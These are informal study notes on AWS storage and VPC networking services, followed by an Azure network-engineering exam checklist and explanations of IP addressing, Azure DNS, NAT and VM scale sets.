  • Generates a URL which provides temporary access to an object to either upload or download object data.

  • The pre-signed URL inherites the permission of the user that created the pre-signed URL

  • Presigned Urls are commonly used to provide access to private objects

  • Can use AWS CLI or AWS SDK to generate Presigned Urls

  • If in case a web-application which need to allow users to download files from a password protected part of the web-app. Then the web-app generates presigned url which expires after 5 seconds. The user downloads the file.

MFA Delete

  • MFA Delete ensures users cannot delete objects from a bucket unless they provide their MFA code.

  • MFA delete can only be enabled under these conditions

    1. The AWS CLI must be used to turn on MFA
    2. The bucket must have versioning turned on
  • Only the bucket owner logged in as Root User can DELETE objects from bucket

AWS Snow Family

  • AWS Snow Family are Storage and compute devices used to physically move data in or out the cloud when moving data over the internet or private connection it to slow, difficult or costly
  • Data Migration: Snowcone, Snowball Edge (Storage Optimized), Snowmobile
  • Edge computing: Snowcone, Snowball Edge (Compute Optimized)
  • Snowcone
    • Small, weighs 4 pounds
    • Rugged
    • Must provide your own battery and cables
    • Snowcone 8TB
    • Snowcone 14TB SSD

Snow family

Storage Services

  • Simple Storage Service (S3)

    • A serverless object storage service is created
    • can upload very large files and unlimited amount of files
    • you pay for what you store
    • Need not worry about the underlying file-system or upgrading the disk size
  • S3 Glacier

    • Cold storage service
    • low cost storage solution for archiving and long-term backup
    • Uses previous generation HDD drives to get that low cost
    • highly secure and durable
  • Elastic Block Store (EBS)

    • a persistent block storage service
    • virtual hard drive in the cloud to attach to EC2 instances
    • can choose different kinds of storage: SSD, IOPS, SSD, Throughput HHD, Cold HHD
  • Elastic File Storage (EFS)

    • a cloud-native NFS file system service
    • File storage you can mount to multiple Ec2 instances at the same time
    • When you need to share files between multiple EC2 instances
  • Storage Gateway

    • a hybrid cloud storage service that extends your on-premise storage to cloud
      • File Gateway : extends your local storage to AWS S3
      • Volume Gateway : caches your local drives to S3 so you have continuous backup of files on cloud
      • Tape Gateway : stores files on virtual tapes for very cost effective and long term storage
  • AWS Snow Family

    • Storage devices used to physically migrate large amounts of data
    • Snowball and Snowball Edge {Snowball does not exist anymore} briefcase size of data storage devices. 50-80 Terabytes
    • Snowmobile Cargo container filled with racks of storage and compute that is transported via semi-trailer tractor truck to transfer upto 100PB of data per trailer
    • Snowcone very small version of snowball that can transfer 8TB of data
  • AWS Backup

    • a fully managed backup service
    • centralize and automate the backup of the backup data across multiple AWS services
    • eg. EC2, EBS, RDS, DynamoDB, EFS, Storage Gateway
    • can create backup plans
  • Cloud Endure Disaster Recovery

    • Continuously replicates your machines into low cost staging area in your target AWS account and preferred region enabling fast and reliable recovery if one of the data center fails
  • Amazon FSx

  • Launch 3rd party high performance file systems on AWS

  • Fully managed service

  • Supports Lustre, OpenZFS, NetApp ONTAP, and Windows File Server (SMB)

  • Data is backed up daily

  • Windows FSx can be mounted on Linux Servers

  • Lustre is derived from Linux and Cluster and used for high-performance computing

  • FSx can be used for on-prem servers using Direct Connect or VPN

  • FSx for Lustre deployment options:

    • Scratch file system
      • Temporary storage, data is not replicated, high performance
    • Persistent File System
      • Long term storage, data is replicated within same AZ (files replaced within minutes upon failure)
  • FSx for NetApp ONTAP is compatible with NFS, SMB, iSCSI. Supports point-in-time instantaneous cloning

  • Amazon Athena

    • A serverless, interactive analytics service built on open-source frameworks, supporting open-table and file formats.
    • Athena provides simplified flexible way to analyze petabytes of data where it lives
    • Analyze data or build applications from an S3 data lake and 30 data sources, including on-premises data sources or other cloud systems using SQL or Python

Storage Gateway

  • Bridge between on-prem and S3 storage

  • Can run as a virtual or hardware appliance on-prem

  • Use Cases:

    1. disaster recovery
    2. backup and restore/cloud migration
    3. tiered storage
    4. on-premises cache and low-latency file access
  • S3 File Gateway

    • S3 buckets are accessible using the NFS and SMB protocol
    • Most recently used data is cached in the file gateway
    • Supports S3 standard, S3 Standard IA, S3 One ZOne A, S3 Intelligent Tiering
    • Transition to S3 Glacier using a Lifecycle Policy
  • FSx File Gateway

    • Native access to Amazon FSx for Windows File Server
    • Useful for caching frequently accessed data on your local network
    • Windows native compatibility
  • Volume Gateway

    • Block storage using iSCSI backed by S3
    • Point in time backups
    • Gives you the ability to restore on-prem volumes
  • Tape Gateway

    • Same as Volume Gateway, but for tapes

Amazon Fsx vs EFS

EFSFSx
EFS is a managed NAS filer for EC2 instances based on Network File System (NFS) version 4FSx is a managed Windows Server that runs Windows Server Message Block (SMB) based files systems
File systems are distributed across availability zones (AZs) to eliminate I/O bottlenecks and improve data durabilityBuilt for high performance and sub-millisecond latency using solid-state drive storage volumes
Better for Linux SystemsApplications: - Web servers and content management systems built on windows and deeply integrated with windows server ecosystem

S3 Object Lock

  • With S3 Object Lock, you can store objects using write-once-read-many (WORM) mode.

  • Object lock can prevent from objects from being deleted or overwritten for a fixed amount of time or indefinitely

    Governance mode

    • Users can’t overwrite or delete an object version or alter its lock settings unless they have special permissions.
    • Protect objects against being deleted by most users, but you can still grant some users permission to alter the retention settings or delete the object if necessary.
    • Used to test retention-period settings before creating a compliance- mode retention period

    Compliance mode


    • A protected object version can’t be overwritten or deleted by any user, including the root user
    • When an object is locked in compliance mode, its retention mode can’t be changed, and tis retention period can’t be shortened.
    • Compliance mode helps ensure that an object version can’t be overwritten or deleted for the duration of the retention period

S3 Event Notifications

  • Automatically react to events within S3
  • Send events to SNS, SQS, Lambda, or Event Bridge. Event Bridge can then send the notification to many other AWS services
    • S3 requires permissions to these resources
  • Use case: generate thumbnails of images

S3 Access Point

  • Simplify security management for S3 buckets
  • Each access point has its own DNS name and access point policy (similar to a bucket policy)

AWS Transfer Family

  • Use FTP, FTPS, or sFTP to transfer files to AWS
  • Pay per provisioned endpoint per hour + data transfer in GB
  • Integrate with existing Authentication system
  • Usage: Sharing files, public datasets, etc.

AWS DataSync

  • Move large amount of data to and from on-prem or other cloud locations into AWS
    • Use NFS, SMB, HDFS, etc. Needs an agent installed.
  • Move AWS service to another AWS service, no agent required.
  • Replication tasks are scheduled (synced)
  • Preserve file permissions and metadata Remember this for the exam!!
  • One agent can use up to 10 Gbps. However, you can setup limits.

Storage Comparison

• S3: Object Storage • S3 Glacier: Object Archival • EBS volumes: Network storage for one EC2 instance at a time • Instance Storage: Physical storage for your EC2 instance (high IOPS) • EFS: Network File System for Linux instances, POSIX filesystem • FSx for Windows: Network File System for Windows servers • FSx for Lustre: High Performance Computing Linux file system • FSx for NetApp ONTAP: High OS Compatibility • FSx for OpenZFS: Managed ZFS file system • Storage Gateway: S3 & FSx File Gateway, Volume Gateway (cache & stored), Tape Gateway • Transfer Family: FTP, FTPS, SFTP interface on top of Amazon $3 or Amazon EFS • DataSync: Schedule data sync from on-premises to AWS, or AWS to AWS • Snowcone / Snowball / Snowmobile: to move large amount of data to the cloud, physically • Database: for specific workloads, usually with indexing and querying

Vpc-endpoint-cheatsheet

  • VPC Endpoints help keep traffic between AWS services within the AWS Network
  • There are two types of VPC Endpoints
    • Interface Endpoints
    • Gateway Endpoints
Interface EndpointsGateway Endpoints
Cost money free
Uses as Elastic Network Interface (ENI) with private IP (powered by AWS PrivateLink)a target for a specific route in the route table
support many AWS servicesonly supports S3 and DynamoDB

Vpc-flow-logs-cheatsheet

  • VPC Flow Logs monitor the in-and-out traffic of your network INterfaces within your PC
  • You can turn on FLow logs at the VPC, Subnet or Network Interface level
  • VPC FLow logs cannot be tagged like other AWS resources
  • You cannot change the configuration of a flow log after it’s created
  • You cannot enable flow logs for VPCs which are peered with your VPC unless it is in the same account
  • VPC FLow logs can be delivered to an S3 or CLoudWatch Logs
  • VPC Flow logs contains the source and destination IP addresses (not hostnames)
  • Some instance traffic is not monitored :
    • Instance traffic generated by contacting the AWS DNS servers
    • Windows license activation traffic from instances
    • Traffic to and from the instance metadta address (169.254.169.254)
    • DHCP Traffic
    • Any Traffic to the reserved IP address of the default VPC router

Introduction to VPC


Introduction to VPC


  • Think of a AWS VPC as your own personal data centre
  • Gives you complete control over your virtual networking environment.

Core Components


  • Internet Gateway (IGW)
  • Virtual Private Gateway (VPN Gateway)
  • Routing Tables
  • Network Access Control Lists (NACLs) - Stateless
  • Security Groups (SG) Stateful
  • Public Subnets
  • Private Subnets
  • Nat Gateway
  • Customer Gateway
  • VPC Endpoints
  • VPC Peering

Key Features


  • VPCs are Region Specific they do not span regions
  • You can create 5 VPC per region
  • Every region comes with a default VPC
  • You can have 200 subnets per VPC
  • You can use IPv4 Cidr Blocks (the address of the VPC)
  • Cost nothing: VPC’s, Route Tables, Nacls, Internet Gateways, Security Groups and Subnets, VPC Peering
  • Some things cost money: eg. NAT Gateway, VPC Endpoints, VPN Gateway, Cutomer Gateway
  • DNS hostnames (should your instance have domain)

Default VPC


  • Craete a VPC with a szie/16 IPv4 CIDR block (172.31.0.0./16)
  • Create a size /20 default subnet in each AZ
  • Create an Internet Gateway and connect it to your default VPC
  • Create a default security group and associate it with your default VPC
  • Create a default network access control list (NACL) and associate it with your default VPC
  • Associate the default DHCP options set for your AWS account with your default VPC
  • when you create a VPC, it automatically has a main route table

VPC Peering


  • VPC Peering allows to connect one VPC with another over a direct network route using private IP addresses

  • Instances on peered VPCs behave just like they are on the same network

  • Connect VPCs across same or different AWS accounts and regions

  • Peering uses a Star Configuration: 1 Central VPC - 4 other VPCs

  • No Transitive Peering (peering must take place directly between VPCs)

    • Needs a one to one connect to immediate VPC
  • No Overlapping CIDR Blocks


Route Tables


  • Route Tables are used to determine where network traffic is directed

  • Each subnet in your VPC must be associated with a route table

  • A subnet can only be associated with one route table at a time, but you can associate multiple subnets with the same route table


Internet Gateway (IGW)


  • The Internet Gateway allows your VPC access to the Internet

  • IGW does two things:

    1. Provide a target in your VPC route tables for internet-routable traffic
    2. Perform network address translation (NAT) for instances that have been assigned public IPv4 addresses
  • To route out to the internet you need to add in your route tables you need to add a route

  • To the internet gateway and set the Destination to be 0.0.0.0/0


Bastion/Jumpbox


  • Bastions are EC2 instances which are security harden.

  • They are designed to help you gain access to your EC2 instances via SSH or RCP that are in a private subnet

  • They are also known as Jump boxes because you are jumping from one box to access another.

  • NAT Gateways/Instances are only intended for EC2 instances to gain outbound access to the internet for things such as security updates .

  • NATs cannot/should not be used as Bastions

  • System Manager’s Sessions Manager replaces the need for Bastions


Direct Connect


  • AWS Direct Connect is the AWS Solution for establishing dedicated network connections from on-premises locations to AWS

  • Very fast network lower Bandwidth 50M-500M or Higher bandwidth 1GB or 10GB

  • Helps reduce network costs and increase bandwidth throughput (great for high traffic networks)

  • Provides a more consistent network experience than a typical internet based connection(reliable and secure)


VPC Endpoints


  • { Think of a secret tunnel where you don’t have tp leave the AWS network}

  • VPC Endpoints allow you to privately connect your VPC to other AWS services, and VPC endpoint services

  • There are two types of VPC Endpoints

    1. Interface endpoints
    2. Gateway Endpoints
  • Eliminates the need for an Internet Gateway, NAT device, VPN connection or AWS Direct Connect connections

  • Instances in the VPC do not require a public IP address to communicate with service resources

  • Traffic between your VPC and other services does not leave the AWS network

  • Horizontally scaled,redundant and highly available VPC component

  • Allows secure communication between instances and services without adding availability risks or bandwidth constraints on your traffic


Interface Endpoints


  • Interface Endpoints are ELastic Network Interfaces (ENI) with a private IP address. They serve as an entry point for traffic going to a supported service
    • Interface Endpoints are powered by AWS PrivateLink
    • Access services hosted on AWS easily and securely by keeping your network traffic within the AWS network
      • ~$7.5/mo
        • Pricing per VPC endpoint per AZ ($/hour) 0.01
        • Pricing per GB data processed ($) 0.01
  • Interface Endpoints support the following AWS services
    • API GATeway
    • CloudFormation
    • CloudWatch
    • Kinesis
    • SageMaker
    • CodeBuild
    • AWS COnfig
    • EC2 API
    • ELB API
    • AWS KMS
    • Secrets Manager
    • Security Token Service
    • Service Catalog
    • SNS -SQS
    • Systems Manager
    • Marketplace Partner Services
    • Endpoint Services in other AWS accounts

VPC Gateway Endpoints


  • A Gateway Endpoint is a gateway that is a target for a specific route in your route table, used for traffic destined for a supported AWS service.
  • To create a Gateway Endpoint, you must specify the VPC in which you want to create the endpoint, and the service to which you want to establish the connection
  • AWS Gateway Endpoint currently supports 2 services
    • Amazon S3
    • DynamoDB

VPC Flow Logs


  • VPC FLow Logs allow you to capture IP Traffic information in-and-out of Network Interfaces withinn your VPC

  • Network Interfaces within your VPC

  • Flow Logs can be created for

    1. VPC
    2. Subnets
    3. Network Interface
  • All log data is stored using Amazon Cloudwatch Logs

  • After a Flow Log is created it can be viewed in details within CloudWatch Logs

  • [version][account-id][interface-id][srcaddr][dstaddr][srcport][destport][protocol][packets][bytes][start][end][action][log-status]

  • 2 123456789010 eni-abc123de 172.31.16.139 172.31.16.21 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK

    • Version The VPC flow logs version
    • account- id The AWS account ID for the flow log
    • interface-id The ID of the network interface for which the traffic is recorded
    • srcaddr The source IPv4 or Ipv6 address. The IPv4 address of the netwrok interface is always its private Ipv4 address
    • dstaddr The destination IPv4 or Ipv6 address. The IPv4 address of the netwrok interface is always its private IPv4 address
    • srcport The source port of the traffic
    • dstport The destination port of the traffic
    • protocol The IANA protocol number of the traffic. For more information, see assigned Internet Protocol Numbers.
    • Packets The number of packets transferred during the capture window
    • Bytes The number of bytes transferred during the capture window
    • start The time, in Unix Seconds of the start of the capture window
    • end The time, in Unix seconds, of the end of the capture window
    • action The action associated with the traffic
      • ACCEPT: The recorded traffic was permitted by the security groups or network ACls
      • REJECT: The recorded traffic was not permitted by the security groups or network ACls
    • log-status The logging status of the flow log
      • OK: Data is logging normally to the chosen destinations
      • NODATA: There was no network traffic to or from the network interface during the capture window
      • SKIPDATA: SOme flow log records were skipped during the capture window. This may be because of an internal capacity constraint or an internal error

NACLs


  • Network Access Control List (NACLs)

  • An (optional) layer of Security that acts as a firewall for controlling traffic in and out of subnet(s) .

  • NACLs acts as a virtual firewall at the subnet level

  • VPCs automatically get a default NACL

  • Subnets are associated with NACLs. Subnets can only belong to a single NACL

  • Each NACL contains a set of rules that can allow or deny traffic into (inbound) and out of (outbound)

  • Rule # determines the order of evaluation. From lowest to highest. The highest rule # can be 32766 and its recommended to work in 10 or 100 increments.

  • You can allow or deny traffic. You could block a single IP address (You can’t do this without Security Groups)

  • Use Case

    • We determine there is a malicious actor at a specific IP address is trying to access our instances so we block their IP

    • We never need to SSH into instances so we add a DENY for these subnets. This is just an additional measure in case our security groups SSH port was left open .


Security Groups


  • Security Groups

    • A virtual firewall that controls the traffic to and from EC2 Instances
  • Security Groups are associated with Ec2 instances

  • Each Security Group contains a set of rules that filter traffic coming into (inbound) and out of (outbound) Ec2 instances.

  • There are no ‘Deny’ rules. All traffic is blocked by default unless a rule specifically allows it.

  • Multiple Instances across multiple subnets can belong to a Security Group.

  • Use Case:

    • You can specify the source to be an IP range or a specific ip (/32 is a specific IP address)
    • You can specify the source to be another security group
    • An instance can belong to multiple Security Groups, and rules are permissive (instead of restrictive) Meaning if you have one Security group which has no allow and you add an allow to another than it will allow.
  • Limits:

    • You can have upto 10,000 Security Groups in a Region (default is 2,500)
    • You can have 60 inbound rules and 60 outbound rules per security Group -16 Security Groups per Elastic Network Interface (ENI) (default is 5)

NACL v/s Security Groups



Site to Site VPN , Virtual Private Gateway and Customer Gateway


  • Virtual Private Gateway (VGW)
    • VPN concentrator on the AWS side of the VPN connection
    • VGW is created and attached to the VPC from which you want to create Site-to-Site VPN connection
  • Customer Gateway Device (On-Premises)
    • What IP address to use?
      • Public Internet-routable IP address for your Customer Gateway device
      • If it’s behind a NAT device that’s enabled for NAT traversal (NAT-T), use the public IP address of the NAT device
      • Important Step: enable Route Propagation for the Virtual Private Gateway in the route table that is associated with your subnets
      • If you need to ping your EC2 instances from on-premises, make sure you add the ICMP protocol on the inbound of your security groups

Secrets Manager


  • Helps to manage, retrieve and rotate database credentials, application credentials, OAuth tokens, API keys and other secrets throughout their lifecycles
  • Helps to improve security posture , because you no longer need hard-coded credentials in application source code.
    • Storing the credentials in Secrets Manager helps to avoid possible compromise by anyone who can inspect the application or the components.
    • Replace hard-coded credentials with a runtime call to the Secrets Manager service to retrieve credentials with a runtime call to the Secrets Manager service to retrieve credentials dynamically when you need them.

Azure

Notes related to Microsoft Azure.

Directory Map

Core Networking Infrastructure Checklist

Design and Implement Private IP Addressing for Azure Resources

  • Plan and implement network segmentation and address spaces
  • Create a virtual network (VNet)
  • Plan and configure subnetting for services, including VNet gateways, private endpoints, firewalls, application gateways, VNet-integrated platform services, and Azure Bastion
  • Plan and configure subnet delegation
  • Create a prefix for public IP addresses
  • Choose when to use a public IP address prefix
  • Plan and implement a custom public IP address prefix (bring your own IP)
  • Create a new public IP address
  • Associate public IP addresses to resources

Design and Implement Name Resolution

  • Design name resolution inside a VNet
  • Configure DNS settings for a VNet
  • Design public DNS zones
  • Design private DNS zones
  • Configure a public or private DNS zone
  • Link a private DNS zone to a VNet

Design and Implement VNet Connectivity and Routing

  • Design service chaining, including gateway transit
  • Design virtual private network (VPN) connectivity between VNets
  • Implement VNet peering
  • Design and implement user-defined routes (UDRs)
  • Associate a route table with a subnet
  • Configure forced tunneling
  • Diagnose and resolve routing issues
  • Design and implement Azure Route Server
  • Identify appropriate use cases for a Virtual Network NAT gateway
  • Implement a NAT gateway

Monitor Networks

  • Configure monitoring, network diagnostics, and logs in Azure Network Watcher
  • Monitor and repair network health using Azure Network Watcher
  • Activate and monitor distributed denial-of-service (DDoS) protection
  • Activate and monitor Microsoft Defender for DNS

Design, Implement, and Manage Connectivity Services Checklist

Design, Implement, and Manage a Site-to-Site VPN Connection

  • Design a site-to-site VPN connection, including for high availability
  • Select an appropriate VNet gateway SKU for site-to-site VPN requirements
  • Implement a site-to-site VPN connection
  • Identify when to use a policy-based VPN versus a route-based VPN connection
  • Create and configure an IPsec/IKE policy
  • Diagnose and resolve virtual network gateway connectivity issues
  • Implement Azure Extended Network

Design, Implement, and Manage a Point-to-Site VPN Connection

  • Select an appropriate virtual network gateway SKU for point-to-site VPN requirements
  • Select and configure a tunnel type
  • Select an appropriate authentication method
  • Configure RADIUS authentication
  • Configure certificate-based authentication
  • Configure authentication using Azure Active Directory (Azure AD), part of Microsoft Entra
  • Implement a VPN client configuration file
  • Diagnose and resolve client-side and authentication issues
  • Specify Azure requirements for Always On authentication
  • Specify Azure requirements for Azure Network Adapter

Design, Implement, and Manage Azure ExpressRoute

  • Select an ExpressRoute connectivity model
  • Select an appropriate ExpressRoute SKU and tier
  • Design and implement ExpressRoute to meet requirements, including cross-region connectivity, redundancy, and disaster recovery
  • Design and implement ExpressRoute options, including Global Reach, FastPath, and ExpressRoute Direct
  • Choose between private peering only, Microsoft peering only, or both
  • Configure private peering
  • Configure Microsoft peering
  • Create and configure an ExpressRoute gateway
  • Connect a virtual network to an ExpressRoute circuit
  • Recommend a route advertisement configuration
  • Configure encryption over ExpressRoute
  • Implement Bidirectional Forwarding Detection
  • Diagnose and resolve ExpressRoute connection issues

Design and Implement an Azure Virtual WAN Architecture

  • Select a Virtual WAN SKU
  • Design a Virtual WAN architecture, including selecting types and services
  • Create a hub in Virtual WAN
  • Choose an appropriate scale unit for each gateway type
  • Deploy a gateway into a Virtual WAN hub
  • Configure virtual hub routing
  • Create a network virtual appliance (NVA) in a virtual hub
  • Integrate a Virtual WAN hub with a third-party NVA

Design and Implement Application Delivery Services Checklist

Design and Implement an Azure Load Balancer

  • Map requirements to features and capabilities of Azure Load Balancer
  • Identify appropriate use cases for Azure Load Balancer
  • Choose an Azure Load Balancer SKU and tier
  • Choose between public and internal
  • Create and configure an Azure Load Balancer
  • Implement a load balancing rule
  • Create and configure inbound NAT rules
  • Create and configure explicit outbound rules, including SNAT

Design and Implement Azure Application Gateway

  • Map requirements to features and capabilities of Azure Application Gateway
  • Identify appropriate use cases for Azure Application Gateway
  • Create a back-end pool
  • Configure health probes
  • Configure listeners
  • Configure routing rules
  • Configure HTTP settings
  • Configure Transport Layer Security (TLS)
  • Configure rewrite sets

Design and Implement Azure Front Door

  • Map requirements to features and capabilities of Azure Front Door
  • Identify appropriate use cases for Azure Front Door
  • Choose an appropriate tier
  • Configure an Azure Front Door, including routing, origins, and endpoints
  • Configure SSL termination and end-to-end SSL encryption
  • Configure caching
  • Configure traffic acceleration
  • Implement rules, URL rewrite, and URL redirect
  • Secure an origin using Azure Private Link in Azure Front Door

Design and Implement Azure Traffic Manager

  • Identify appropriate use cases for Azure Traffic Manager
  • Configure a routing method
  • Configure endpoints

Design and Implement Private Access to Azure Services Checklist

  • Plan an Azure Private Link service
  • Create a Private Link service
  • Integrate a Private Link service with DNS
  • Plan private endpoints
  • Create private endpoints
  • Configure access to Azure resources using private endpoints
  • Connect on-premises clients to a private endpoint
  • Integrate a private endpoint with DNS

Design and Implement Service Endpoints

  • Choose when to use a service endpoint
  • Create service endpoints
  • Configure service endpoint policies
  • Configure access to service endpoints

Secure Network Connectivity to Azure Resources Checklist

Implement and Manage Network Security Groups (NSGs)

  • Create a network security group (NSG)
  • Associate an NSG to a resource
  • Create an application security group (ASG)
  • Associate an ASG to a network interface card (NIC)
  • Create and configure NSG rules
  • Interpret NSG flow logs
  • Validate NSG flow rules
  • Verify IP flow
  • Configure an NSG for remote server administration, including Azure Bastion

Design and Implement Azure Firewall and Azure Firewall Manager

  • Map requirements to features and capabilities of Azure Firewall
  • Select an appropriate Azure Firewall SKU
  • Design an Azure Firewall deployment
  • Create and implement an Azure Firewall deployment
  • Configure Azure Firewall rules
  • Create and implement Azure Firewall Manager policies
  • Create a secure hub by deploying Azure Firewall inside an Azure Virtual WAN hub

Design and Implement a Web Application Firewall (WAF) Deployment

  • Map requirements to features and capabilities of WAF
  • Design a WAF deployment
  • Configure detection or prevention mode
  • Configure rule sets for WAF on Azure Front Door
  • Configure rule sets for WAF on Application Gateway
  • Implement a WAF policy
  • Associate a WAF policy

Design-and-implement-core-network-infra

Directory Map

IPv4 and IPv6 Addressing

IPv4 Addressing

Definition: IPv4 (Internet Protocol version 4) is the fourth version of the Internet Protocol (IP). It is the most widely used IP version for connecting devices to the internet.

Format:

  • IPv4 addresses are 32-bit numerical labels.
  • Represented in decimal format as four octets separated by periods (e.g., 192.168.1.1).
  • Each octet can range from 0 to 255.

Classes:

  • Class A: 0.0.0.0 to 127.255.255.255 (large networks)
  • Class B: 128.0.0.0 to 191.255.255.255 (medium-sized networks)
  • Class C: 192.0.0.0 to 223.255.255.255 (small networks)
  • Class D: 224.0.0.0 to 239.255.255.255 (multicast)
  • Class E: 240.0.0.0 to 255.255.255.255 (experimental)

Special Addresses:

  • Private Addresses:
    • Class A: 10.0.0.0 to 10.255.255.255
    • Class B: 172.16.0.0 to 172.31.255.255
    • Class C: 192.168.0.0 to 192.168.255.255
  • Loopback Address: 127.0.0.1
  • Broadcast Address: 255.255.255.255

Limitations:

  • Limited address space (about 4.3 billion addresses).
  • Exhaustion of available addresses.

IPv6 Addressing

Definition: IPv6 (Internet Protocol version 6) is the successor to IPv4, designed to address the limitations and address exhaustion of IPv4.

Format:

  • IPv6 addresses are 128-bit numerical labels.
  • Represented in hexadecimal format as eight groups of four hexadecimal digits separated by colons (e.g., 2001:0db8:85a3:0000:0000:8a2e:0370:7334).
  • Leading zeros in each group can be omitted, and consecutive groups of zeros can be replaced with “::” (e.g., 2001:db8:85a3::8a2e:370:7334).

Special Addresses:

  • Unicast Addresses: Identifies a single interface.
    • Global Unicast: Globally unique (e.g., 2000::/3).
    • Link-Local: Used within a single network segment (e.g., fe80::/10).
  • Multicast Addresses: Identifies multiple interfaces (e.g., ff00::/8).
  • Anycast Addresses: Assigned to multiple interfaces, with packets delivered to the nearest one.
  • Loopback Address: ::1
  • Unique Local Addresses (ULA): fc00::/7

Advantages:

  • Vast address space (2^128 addresses).
  • Improved routing efficiency and hierarchical addressing.
  • Simplified packet header for better performance.
  • Enhanced security features (mandatory IPsec support).
  • Auto-configuration capabilities.

Comparison

FeatureIPv4IPv6
Address Length32 bits128 bits
Address FormatDecimal (e.g., 192.168.1.1)Hexadecimal (e.g., 2001:db8::1)
Address Space~4.3 billion addressesVirtually unlimited (2^128 addresses)
Header ComplexityMore complexSimplified
ConfigurationManual or DHCPAuto-configuration (stateless)
SecurityOptional (IPsec)Mandatory (IPsec)

IPv4 and IPv6 are both critical for networking, with IPv6 designed to overcome the limitations of IPv4 and ensure the continued growth and scalability of the internet.

Azure DNS

Definition

Azure DNS is a cloud-based Domain Name System (DNS) service provided by Microsoft Azure. It allows you to host your DNS domains alongside your Azure resources, enabling you to manage DNS records using the same credentials, APIs, tools, and billing as your other Azure services.

Key Features

  1. Global Reach:

    • Azure DNS uses a global network of name servers to provide fast DNS responses and high availability.
    • DNS queries are answered from the closest DNS server to the end user.
  2. DNS Zones:

    • Host your DNS domain in Azure DNS by creating a DNS zone.
    • A DNS zone is used to manage the DNS records for a specific domain.
  3. DNS Records:

    • Support for all common DNS record types, including A, AAAA, CNAME, MX, NS, PTR, SOA, SRV, and TXT.
    • Manage records through the Azure portal, Azure CLI, Azure PowerShell, and REST API.
  4. Alias Records:

    • Alias records allow you to map DNS names to Azure resources like Azure Traffic Manager, public IP addresses, and Azure Content Delivery Network (CDN) endpoints.
    • Automatically update DNS records when the underlying Azure resources change.
  5. Integration with Azure Services:

    • Seamlessly integrate with other Azure services for dynamic DNS updates and automated DNS management.
    • Use Azure Private DNS for internal domain name resolution within your Azure virtual networks.
  6. Security:

    • DNS queries are secured with DNSSEC (DNS Security Extensions) to protect against spoofing and cache poisoning.
    • Role-Based Access Control (RBAC) to manage permissions and access to DNS zones and records.
  7. Scalability:

    • Azure DNS is designed to handle large-scale DNS workloads.
    • Scalable to meet the needs of high-traffic domains.
  8. Monitoring and Analytics:

    • Monitor DNS queries and traffic patterns using Azure Monitor.
    • View detailed metrics and logs for DNS performance and availability.

Best Practices

  1. Zone Management:

    • Use descriptive names for DNS zones to clearly identify their purpose.
    • Organize DNS zones to reflect the structure of your organization or application.
  2. Record Management:

    • Use alias records to simplify DNS management for Azure resources.
    • Regularly review and update DNS records to ensure accuracy.
  3. Security:

    • Implement DNSSEC to enhance the security of your DNS infrastructure.
    • Use RBAC to control access to DNS zones and records.
  4. Monitoring:

    • Enable monitoring and logging for DNS zones to detect and troubleshoot issues.
    • Set up alerts for unusual DNS activity or changes in traffic patterns.

Use Cases

  • Hosting DNS Domains: Manage DNS records for your domains within Azure.
  • Internal Domain Resolution: Use Azure Private DNS for internal name resolution within virtual networks.
  • Application Delivery: Optimize DNS routing with Azure Traffic Manager for high availability and performance.
  • Automated DNS Management: Integrate with Azure services for dynamic DNS updates and automation.

Azure DNS provides a reliable and scalable DNS service that simplifies domain management and integrates seamlessly with your Azure infrastructure.

Internal (Private) Name Resolution Scenarios and Options

  • Scenarios:

    • Name Resolution within a Virtual Network: Resolve names of resources within the same virtual network.
    • Name Resolution between Virtual Networks: Resolve names of resources across different virtual networks.
    • Name Resolution between On-Premises and Azure: Resolve names of resources between on-premises networks and Azure virtual networks.
  • Options:

    • Azure-provided DNS: Use Azure-provided DNS for name resolution within a virtual network.

      • This is the default when you create a virtual network in Azure. Anytime you create a vNet in Azure, the platform configures it to use this option and assigns a unique private DNS suffix to it in the .internal.cloudapp.net format. Azure’s DHCP will assign this DNS suffix to any resource that obtains an IP address.
      • The default Azure provided DNS Server uses a virtual IP address of 168.63.129.16. This server limits each client to 1000 queries per second. Anything above this is throttled.
      • This option can only cover scenario 1 above (Name Resolution within a Virtual Network).
      • This option does not support WINS or NetBios.
      • We cannot enable or configure logging within this option.
    • Custom DNS: Configure custom DNS servers for name resolution within a virtual network.

      • You can host your own DNS server and forward name resolution requests to it.
    • Azure Private DNS: Use Azure Private DNS for name resolution between virtual networks and on-premises networks.

      • Azure Private DNS provides a reliable, secure DNS service to manage and resolve domain names in a virtual network without the need for a custom DNS solution.
      • This service can be used to create forward and reverse DNS zones (up to a max of 1000 per subscription).
      • An Azure Private DNS Zone can contain up to 25000 record sets, and supports all common record types.
      • After you create a Private DNS zone, it must be ‘linked’ to a vNet.
      • When linking a Private DNS Zone to a vNet, you can choose to enable auto-registration of virtual machines in the vNet to the DNS zone. This will automatically register the VM’s hostname and IP address in the DNS zone.
      • A virtual network can be linked to multiple private DNS zones, but it can only be linked to one private DNS zone with auto-registration enabled.

Public Name Resolution Scenarios and Options

  • Scenarios:
    • Name Resolution for Internet Clients: Resolve names of resources for clients on the internet.
  • Options:
    • Azure DNS: Use Azure DNS for public name resolution.
      • Azure DNS is a cloud-based DNS service that hosts your DNS domains and provides name resolution for internet clients.
      • You can manage DNS records for your domains using Azure DNS and integrate it with other Azure services.

Azure Virtual Network NAT

  • Azure Virtual Network NAT (Network Address Translation) is a service that enables outbound connectivity for virtual networks. It allows virtual machines (VMs) in a virtual network to access the internet without public IP addresses. NAT simplifies outbound connectivity for VMs by translating their private IP addresses to a public IP address.

Azure Virtual Network NAT provides the following key features and benefits:

  • Outbound Connectivity: NAT enables VMs in a virtual network to access the internet for software updates, package downloads, and other external services without requiring public IP addresses on the VMs themselves.
  • Security: NAT helps secure your virtual network by hiding the private IP addresses of VMs from external sources. Only the public IP address of the NAT gateway is exposed to the internet.
  • Cost-Effective: NAT reduces the need for public IP addresses on individual VMs, which can help lower costs associated with IP address management.
  • Scalability: NAT can handle high volumes of outbound traffic from multiple VMs in a virtual network, providing scalable outbound connectivity for your applications.
  • Ease of Management: NAT simplifies outbound connectivity configuration by providing a centralized service for translating private IP addresses to a public IP address.

Subnets

Virtual Machine Scale Sets

Azure Virtual Machine Scale Sets offer a robust and flexible solution for deploying, managing, and scaling applications, ensuring high availability and optimal performance to meet varying demands.

Overview

  • Used to create and manage a group of identical, load balanced VMs
  • Traffic will be distributed to the VM instances via a load balancer service
  • VM instances are managed by a single Azure Resource Manager template
  • VM instances can be automatically scaled in or out based on demand or a defined schedule
  • VM instances can be automatically healed if they become unhealthy
  • VM instances can be automatically updated with the latest OS image
